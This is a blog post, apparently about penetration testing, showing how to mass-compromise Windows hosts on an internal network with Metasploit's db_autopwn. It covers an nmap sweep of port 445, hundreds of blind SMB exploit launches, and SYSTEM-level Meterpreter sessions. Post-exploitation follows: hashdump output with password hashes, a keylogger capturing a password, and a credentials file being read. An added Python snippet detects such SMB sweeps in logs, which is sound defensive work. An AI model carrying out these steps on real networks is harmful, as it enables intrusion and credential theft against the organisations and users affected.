Autopwn with Metasploit

When we do penetration testing work, especially in a client's internal environment, the first step is usually scanning. Every consultant has a different method: some scan quickly to map which targets are alive, others run an in-depth scan that is reviewed afterwards, and so on.

If we are not given a specific target (e.g. the target is defined as a network containing a server farm, where service identification has to be done carefully), then mass-owning, aimed at getting as many targets as possible as easily as possible, becomes necessary. That includes the user machines that handle day-to-day operations in the client's environment. The goal, of course, is to collect all kinds of information such as client applications, important data (for example usernames / passwords), email, etc., which will then be used while gaining access to deeper and more important systems.

Metasploit is one of the easiest tools to use for this purpose, all the more so because Metasploit is an open-source application with powerful capabilities. There are various ways to work out roughly which kind of exploit will give us a shell on tens or hundreds of target machines in a network; one of them of course relies on the assumption that file sharing is enabled in the internal environment. File sharing means the SMB protocol on Windows, which leads us to scanning ports 139/445.

Holes in the SMB protocol are one of my favourites when I want to start a mass-owning run quickly. Metasploit provides the db_autopwn feature: we scan specific ports with nmap, the results are stored in a database (the default database used by Metasploit is sqlite3), and Metasploit then looks up the matching exploits (here matching is done by target port, 139/445) and fires them blindly at the targets for mass-owning. At a glance it looks quite ordinary, but this automation is very useful for a consultant.

Here is one example of its use:

$ ../bin/ruby msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|

=[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 545 exploits - 257 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
=[ svn r9012 updated today (2010.04.05)

msf > db_create 10.69.2.0.txt
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: 10.69.2.0.txt
msf > db_nmap -p 445 10.69.2.1/24

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2010-04-06 15:59 WIT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.69.2.1
Host is up (0.0039s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.3
Host is up (0.0017s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.5
Host is up (0.0017s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.135
Host is up (0.0017s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.202
Host is up (0.0015s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap scan report for 10.69.2.253
Host is up (0.023s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap scan report for 10.69.2.254
Host is up (0.0041s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (46 hosts up) scanned in 2.52 seconds
msf > db_autopwn -p -e
[*] (1/756 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 10.69.2.1:445...
[*] (2/756 [0 sessions]): Launching exploit/multi/samba/nttrans against 10.69.2.1:445...
[*] (3/756 [0 sessions]): Launching exploit/multi/samba/usermap_script against 10.69.2.1:445...
[*] (4/756 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 10.69.2.1:445...
[*] (5/756 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 10.69.2.1:445...
[*] (6/756 [0 sessions]): Launching exploit/solaris/samba/trans2open against 10.69.2.1:445...
[*] (7/756 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 10.69.2.1:445...

[*] (54/756 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 10.69.2.115:445...
[*] (55/756 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 10.69.2.115:445...
[*] (56/756 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 10.69.2.115:445...
[*] (57/756 [1 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 10.69.2.115:445...
[*] (58/756 [1 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 10.69.2.115:445...
[*] (59/756 [1 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.69.2.115:445...
[*] (60/756 [1 sessions]): Launching exploit/windows/smb/msdns_zonename against 10.69.2.115:445...
[*] (61/756 [1 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 10.69.2.115:445...
[*] (62/756 [1 sessions]): Launching exploit/windows/smb/psexec against 10.69.2.115:445...
[*] (63/756 [1 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 10.69.2.115:445...
[*] Meterpreter session 1 opened (10.69.2.133:59949 -> 10.69.2.10:32385)
[*] (64/756 [1 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 10.69.2.118:445...
[*] (65/756 [1 sessions]): Launching exploit/multi/samba/nttrans against 10.69.2.118:445...
[*] (66/756 [1 sessions]): Launching exploit/multi/samba/usermap_script against 10.69.2.118:445...

[*] (384/756 [2 sessions]): Launching exploit/solaris/samba/trans2open against 10.69.2.25:445...
[*] (385/756 [2 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 10.69.2.25:445...
[*] (386/756 [2 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 10.69.2.25:445...
[*] (387/756 [2 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 10.69.2.25:445...
[*] (388/756 [2 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 10.69.2.25:445...
[*] (389/756 [2 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 10.69.2.25:445...
[*] (390/756 [2 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 10.69.2.25:445...
[*] (391/756 [2 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 10.69.2.25:445...
[*] Meterpreter session 2 opened (10.69.2.133:61145 -> 10.69.2.19:5272)

[*] (756/756 [4 sessions]): Waiting on 1 launched modules to finish execution...
[*] (756/756 [4 sessions]): Waiting on 1 launched modules to finish execution...
[*] (756/756 [4 sessions]): Waiting on 0 launched modules to finish execution...

msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter NT AUTHORITY\SYSTEM @ MIMIN 10.69.2.133:59949 -> 10.69.2.10:32385
2 meterpreter NT AUTHORITY\SYSTEM @ MUMUN 10.69.2.133:61145 -> 10.69.2.19:5272
3 meterpreter NT AUTHORITY\SYSTEM @ MOMON 10.69.2.133:61655 -> 10.69.2.42:28353
4 meterpreter NT AUTHORITY\SYSTEM @ MAMAN 10.69.2.133:62029 -> 10.69.2.70:25435

Very easy and efficient. Next we can interact with one of the targets:

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
992 SMSS.EXE x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
1064 CSRSS.EXE x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
1088 WINLOGON.EXE x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1132 SERVICES.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1144 LSASS.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1284 SVCHOST.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1376 SVCHOST.EXE x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1468 SVCHOST.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1584 SVCHOST.EXE x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\System32\svchost.exe
1712 SVCHOST.EXE x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\svchost.exe
1784 ccSetMgr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
1848 ccEvtMgr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
1976 SPOOLSV.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
256 DefWatch.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Symantec AntiVirus\DefWatch.exe
312 R_SERVER.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\r_server.exe
468 Rtvscan.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Symantec AntiVirus\Rtvscan.exe
648 WDFMGR.EXE x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\wdfmgr.exe
372 Explorer.EXE x86 0 MIMIN\Administrator C:\WINDOWS\Explorer.EXE
1556 ALG.EXE x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe

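The sweep in the transcript above has a distinctive footprint for the blue team: one source reaches 445/tcp on every address of a /24 within a couple of seconds and then launches hundreds of exploit attempts. The following is an added example, not part of the original post, that flags that pattern in connection logs; the log format and the sample lines are constructed for the example and reuse only addresses that appear in the transcript.

```python
"""Flag an SMB sweep like the db_autopwn run above in firewall/flow logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines (not from the post): "time src dst dport action".
# The scanner address 10.69.2.133 and the subnet mirror the transcript.
SAMPLE_LOG = """\
2010-04-06T15:59:01 10.69.2.133 10.69.2.1 445 allow
2010-04-06T15:59:01 10.69.2.133 10.69.2.3 445 allow
2010-04-06T15:59:01 10.69.2.133 10.69.2.5 445 allow
2010-04-06T15:59:02 10.69.2.133 10.69.2.10 445 allow
2010-04-06T15:59:02 10.69.2.133 10.69.2.19 445 allow
2010-04-06T15:59:02 10.69.2.133 10.69.2.42 445 allow
2010-04-06T15:59:03 10.69.2.133 10.69.2.70 445 allow
2010-04-06T15:59:03 10.69.2.133 10.69.2.135 445 allow
2010-04-06T15:59:03 10.69.2.133 10.69.2.202 445 allow
2010-04-06T15:59:03 10.69.2.133 10.69.2.253 445 deny
2010-04-06T15:59:10 10.69.2.50 10.69.2.10 445 allow
2010-04-06T16:30:00 10.69.2.50 10.69.2.19 445 allow
"""

def parse(log_text):
    """Yield (timestamp, src, dst, dport) tuples; malformed lines are skipped."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, dport, _action = parts
        yield datetime.fromisoformat(ts), src, dst, int(dport)

def find_smb_sweeps(log_text, threshold=8, window=timedelta(seconds=60)):
    """Return {src: distinct_hosts} for sources reaching >= threshold distinct
    hosts on 445/tcp inside a sliding window. Denied connections count too:
    a scan is a scan whether or not the port was open."""
    events = defaultdict(list)                  # src -> [(ts, dst), ...]
    for ts, src, dst, dport in parse(log_text):
        if dport == 445:
            events[src].append((ts, dst))
    sweeps = {}
    for src, hits in events.items():
        hits.sort()
        start = 0
        for end, (ts, _) in enumerate(hits):
            while ts - hits[start][0] > window:  # drop hits older than the window
                start += 1
            seen = {dst for _, dst in hits[start:end + 1]}
            if len(seen) >= threshold:
                sweeps[src] = max(len(seen), sweeps.get(src, 0))
    return sweeps
```

On the sample data only the scanner is reported (10 distinct hosts in under 60 s); the second source touches two hosts half an hour apart and stays quiet.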
When using Metasploit, it is much better to use the Meterpreter payload. Meterpreter is very flexible; among other things, we can use Meterpreter scripts to automate the post-exploitation process as well. Here is one example:

meterpreter > run
run checkvm run hostsedit run packetrecorder run srt_webdrive_priv
run credcollect run keylogrecorder run persistence run uploadexec
run dumplinks run killav run pml_driver_config run virtualbox_sysenter_dos
run get_local_subnets run kitrap0d run prefetchtool run vnc
run get_pidgin_creds run memdump run remotewinenum run winbf
run getcountermeasure run metsvc run scheduleme run winenum
run getgui run migrate run schtasksabuse run wmic
run gettelnet run multicommand run scraper
run getvncpw run multiscript run screen_unlock
run hashdump run netenum run search_dwld
meterpreter > run get_local_subnets
Local subnet: 10.69.2.0/255.255.255.0
meterpreter > hashdump
Administrator:500:ca3ef416a1a74feeaad3b435b51404ee:0fece65b56667847d295837650213f55:::
ASPNET:1004:99dd4e23fffb09580a71caa5e99d91e5:3706b43c728bc80f32877d2bddb78c88:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1006:aa480fa90bacb34dde8e3c460f7d2b17:e7cdcd31f92ee807b492af0f35acde15:::
IUSR_ZULAF_113:1008:afe9ca156215a25bf0f64001926cdae4:36924f3d0a661bb219b06c4391f64990:::
IWAM_ZULAF_113:1009:934293856013aab8acde689c80f122c9:d2bbc11dead4983b814f0f7d7aaf2fb4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:4abab1af24678f3f559c58fe310fa25b:::
meterpreter > screenshot
Screenshot saved to: /Volumes/Metasploit/trunk/CKqbQLKx.jpeg
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
admin
Gr9dikeid9
meterpreter > cat blablablaclient.ini
??[Client]
driver = thunder
location = earth:1337
application = p_earth_d
userID = earth
password = earth23udieu8

That is the introduction to autopwn with Metasploit. In the next discussion we will cover the various features integrated into Metasploit and autopwn. Have fun!


One thought on “Autopwn with Metasploit”

  1. very interesting… I am a complete novice with Metasploit, but I am very interested in the words “focusing on low-level hacking technology”. I will try it later using VirtualBox on my Ubuntu… hopefully it works… because I have never tried this kind of penetration stuff before…
